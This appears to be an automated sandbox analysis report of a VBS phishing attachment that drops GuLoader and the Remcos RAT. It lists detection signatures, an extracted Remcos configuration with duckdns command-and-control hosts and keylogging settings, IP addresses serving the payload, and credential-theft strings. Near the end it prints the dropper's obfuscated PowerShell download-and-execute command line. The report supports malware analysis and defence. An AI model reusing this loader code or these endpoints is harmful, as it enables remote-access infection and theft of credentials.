Windows Analysis Report
BRUFEN ORDER VAC442_7467247728478134247.vbs

Overview

General Information

Sample name: BRUFEN ORDER VAC442_7467247728478134247.vbs
Analysis ID: 1430121
MD5: dd7ee221912c6bb240e9e428b0c3c1c1
SHA1: 666f5809125dc65def3e8b57bd9577bb6550a3b8
SHA256: 871ab4e1e90907a6d8f3e7743a35d9b8e9d5be98c3f340bb5744fe454c59a20b
Tags: vbs
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: jgbours284hawara01.duckdns.org Virustotal: Detection: 6% Perma Link
Source: http://87.121.105.163/Hylasmus.ocx Virustotal: Detection: 15% Perma Link
Source: http://87.121.105.163 Virustotal: Detection: 18% Perma Link
Source: jgbours284hawara01.duckdns.org Virustotal: Detection: 6% Perma Link
Source: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin Virustotal: Detection: 16% Perma Link
Source: BRUFEN ORDER VAC442_7467247728478134247.vbs ReversingLabs: Detection: 15%
Source: BRUFEN ORDER VAC442_7467247728478134247.vbs Virustotal: Detection: 16% Perma Link
Source: Yara match File source: Process Memory Space: wab.exe PID: 7140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1632425939.000001F642AF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1635082648.000001F640D5F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdb(sL source: powershell.exe, 00000004.00000002.2025441868.00000000082F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000004.00000002.2019633047.00000000073EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2026042755.0000000008362000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_230110F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_230110F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49738 -> 45.88.90.110:3050
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.4:49738
Source: Malware configuration extractor URLs: jgbours284hawara01.duckdns.org
Source: unknown DNS query: name: jgbours284hawara01.duckdns.org
Source: unknown DNS query: name: jgbours284hawara02.duckdns.org
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 45.88.90.110:3050
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: global traffic HTTP traffic detected: GET /Hylasmus.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /Hylasmus.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 00000009.00000002.2945311408.0000000022FE0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000009.00000002.2945562840.00000000237C0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000009.00000002.2945562840.00000000237C0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: jgbours284hawara01.duckdns.org
Source: powershell.exe, 00000001.00000002.2137195965.000001FD44E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2137195965.000001FD4637F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2944167133.0000000022A00000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2926027586.0000000007043000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
Source: wab.exe, 00000009.00000002.2926027586.0000000007043000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin8
Source: wab.exe, 00000009.00000002.2944167133.0000000022A00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPermsEviduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
Source: wab.exe, 00000009.00000002.2926027586.0000000007043000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binU
Source: powershell.exe, 00000001.00000002.2137195965.000001FD44E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Hylasmus.ocxP
Source: powershell.exe, 00000004.00000002.2013438309.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Hylasmus.ocxXRxlD
Source: powershell.exe, 00000001.00000002.2137195965.000001FD46873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2926027586.0000000007043000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp3a
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpFa)D
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpc
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg:3
Source: powershell.exe, 00000001.00000002.2236403690.000001FD54C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016192272.00000000059C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2013438309.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2137195965.000001FD44C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2013438309.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2013438309.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe String found in binary or memory: http://www.ebuddy.com
Source: wab.exe String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000009.00000002.2945311408.0000000022FE0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000009.00000002.2945311408.0000000022FE0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000001.00000002.2137195965.000001FD44C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2013438309.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2013438309.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2137195965.000001FD45F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.2236403690.000001FD54C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016192272.00000000059C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 13_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 13_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 14_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 15_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: Process Memory Space: wab.exe PID: 7140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

System Summary

barindex
Source: amsi32_4944.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7008, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4944, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5626
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5626 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5626 Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte 